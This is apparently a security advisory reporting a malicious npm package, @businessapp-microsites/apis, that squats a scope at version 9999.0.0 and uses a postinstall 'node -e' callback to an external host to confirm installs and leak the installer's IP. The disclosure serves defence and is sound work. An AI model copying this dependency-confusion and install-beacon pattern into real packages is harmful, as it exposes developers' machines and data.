MAL-2026-6696
Malicious code in @businessapp-microsites/apis (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8e03d8a4119cd5d1c143adb4fcdab1625747178082a6d56717e758b513aec4f7) Package squats the @businessapp-microsites npm scope and is published at version 9999.0.0 to outrank any internal version during dependency resolution. The package.json declares a postinstall script that runs `node -e` to issue an HTTPS GET to poc-trustpilot-npm-1782770591.testingboxes.com with a unique per-package token in the URL path. On any `npm install` that resolves this scope from the public registry, the installer's machine performs an outbound callback that confirms execution and discloses the installer's source IP and the fact-of-install to a third-party host. The combination of an unregistered-scope squat, the 9999.0.0 version pin, and an install-time beacon to an external host is the canonical dependency-confusion attack pattern; researcher framing in the package metadata does not change the runtime behavior on any machine that installs it.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for @businessapp-microsites/apis (npm). Pin to a known-safe version or switch to an alternative.